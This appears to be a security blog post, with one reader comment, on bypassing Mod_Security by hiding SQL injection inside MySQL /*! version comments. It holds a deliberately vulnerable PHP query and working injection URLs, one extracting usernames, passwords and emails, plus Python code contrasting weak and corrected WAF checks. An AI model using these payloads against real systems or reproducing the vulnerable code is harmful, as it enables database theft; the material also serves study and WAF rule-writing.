Another fine method to exploit SQL Injection and bypass WAF

A method that I found today in the MySQL documentation struck me with its simplicity and with the fact that I had not noticed it before. Let me describe this method of bypassing a WAF.

MySQL servers accept comments of the following form:

/*!sql-code*/ and /*!12345sql-code*/

In both cases the SQL code inside the comment is executed! The second form means that "sql-code" is executed only if the server version is greater than or equal to the given number. That number is MySQL's numeric version id (major*10000 + minor*100 + patch, so 50509 stands for 5.5.9); since 12345 corresponds to version 1.23.45, every MySQL server in use will execute the second form as well. The construct is MySQL-specific: other DBMSs, and anything that merely skips /* ... */, see only a comment.

As I have repeatedly asserted [1,2], some WAFs skip comments during signature matching. Among such WAFs is the latest stable build of Mod_Security (v. 2.5.9).

Here is a simple example:


<?php
// Deliberately vulnerable: the id parameter is concatenated into the query
// without validation, quoting or escaping.
$query = "SELECT name FROM table where id = " . $_GET['id'];

$result = mysql_query($query);


If the web application is protected by Mod_Security, the following request is blocked:

/?id=1+union+select+1

It is remarkable that even the following requests, built with the HTTP Parameter Pollution / HTTP Parameter Fragmentation (HPP/HPF) techniques, are blocked by the WAF as well, although they would not even yield a valid query in the example above (PHP keeps only the last value of a repeated parameter, so the comment is never closed on the server side):

/?id=1+union/*&id=*/select+table_name+from+information_schema.columns

/?id=1+union/*&blabla1=*/select+table_name&blabla2=from+information_schema.columns


But if we use the comment form described above, Mod_Security lets the requests through while MySQL executes the comment body, so the server actually runs "SELECT name FROM table where id = 1 limit 0 union select ..." and the SQL Injection can be exploited:

/?id=1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/

/?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/

/?id=1/*!limit+0+union+select+concat_ws(0x3a,username,password,email)+from+users*/
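To make the mechanism behind both the comment syntax above and the three bypass requests concrete, here is an added example that is not part of the original post. It models, in Python, how MySQL treats /*! ... */ and /*!NNNNN ... */ comments, puts a comment-skipping signature check of the kind the post attributes to Mod_Security 2.5.9 next to a check that first normalises the statement to what MySQL would execute, and runs the post's own requests (URL-decoded, '+' turned into a space) through both. The assumed backend version 5.5.9 (version id 50509), the function names and the "union ... select" signature are illustrative choices of this example, not something the post or Mod_Security defines; the MySQL model is simplified and does not handle comment markers inside string literals.

```python
import re

# Added example (not from the original post): model of MySQL version comments,
# a comment-skipping WAF check, and a normalising WAF check, run on the post's
# requests. The server version, names and signature are assumptions.

# /*! body */       -> body is executed by every MySQL server
# /*!NNNNN body */  -> body is executed only if server version id >= NNNNN
VERSION_COMMENT = re.compile(r"/\*!(\d{5})?(.*?)\*/", re.DOTALL)
# Anything else between /* and */ is an ordinary comment.
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

# Illustrative WAF signature: "union ... select" within one statement.
UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)

# Assumed backend: MySQL 5.5.9, whose numeric version id is 50509.
ASSUMED_SERVER_VERSION = 50509


def build_query(user_id):
    """Mirror the post's vulnerable PHP: raw concatenation of the id parameter."""
    return "SELECT name FROM table where id = " + user_id


def mysql_view(sql, server_version=ASSUMED_SERVER_VERSION):
    """Return the statement as MySQL's parser effectively sees it.

    Simplified model of the documented rule: a version comment with no number,
    or with a number <= server_version, loses its delimiters and keeps its
    body; every other comment is replaced by a single space.
    """
    def expand(match):
        version, body = match.group(1), match.group(2)
        if version is None or int(version) <= server_version:
            return " " + body.strip() + " "
        return " "

    without_version_comments = VERSION_COMMENT.sub(expand, sql)
    return PLAIN_COMMENT.sub(" ", without_version_comments).strip()


def comment_skipping_waf_blocks(sql):
    """The weak check: strip every /* ... */ first, then look for the signature.

    This is the behaviour the post exploits: the version comment, body and
    all, disappears before the signature is evaluated.
    """
    return UNION_SELECT.search(PLAIN_COMMENT.sub(" ", sql)) is not None


def normalising_waf_blocks(sql):
    """The corrected check: evaluate the signature on what MySQL would run.

    The WAF cannot know the backend version, so it assumes the worst case and
    treats every version comment as live (99999 exceeds any real version id).
    """
    return UNION_SELECT.search(mysql_view(sql, server_version=99999)) is not None


# The post's requests, URL-decoded.
PLAIN_PAYLOAD = "1 union select 1"
HPP_PAYLOAD = "1 union/*&id=*/select table_name from information_schema.columns"
COMMENT_PAYLOAD = ("1/*!limit 0 union select concat_ws(0x3a,table_name,column_name)"
                   " from information_schema.columns*/")
VERSIONED_PAYLOAD = ("1/*!12345limit 0 union select concat_ws(0x3a,table_name,column_name)"
                     " from information_schema.columns*/")


if __name__ == "__main__":
    for payload in (PLAIN_PAYLOAD, HPP_PAYLOAD, COMMENT_PAYLOAD, VERSIONED_PAYLOAD):
        query = build_query(payload)
        print("request id=%s" % payload)
        print("  comment-skipping WAF blocks: %s" % comment_skipping_waf_blocks(query))
        print("  normalising WAF blocks:      %s" % normalising_waf_blocks(query))
        print("  MySQL executes:              %s" % mysql_view(query))
```

Running it shows the first two requests blocked by both checks, while the two /*! requests pass the comment-skipping check and still reach MySQL as "... where id = 1 limit 0 union select ...". The normalising check, or simply treating the "/*!" marker itself as a signature, closes the gap on the WAF side; the application-side fix remains not concatenating user input into the statement at all.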

Well, one more method to our arsenal 🙂

13 thoughts on “Another fine method to exploit SQL Injection and bypass WAF”

  1. Additionally, you mention that v2.5.9 is the latest version, but v2.5.10 has been out stable for some time now. But, as Ivan mentioned above, you still need to edit the rules to look for "/*!". Thanks for the great article and work.
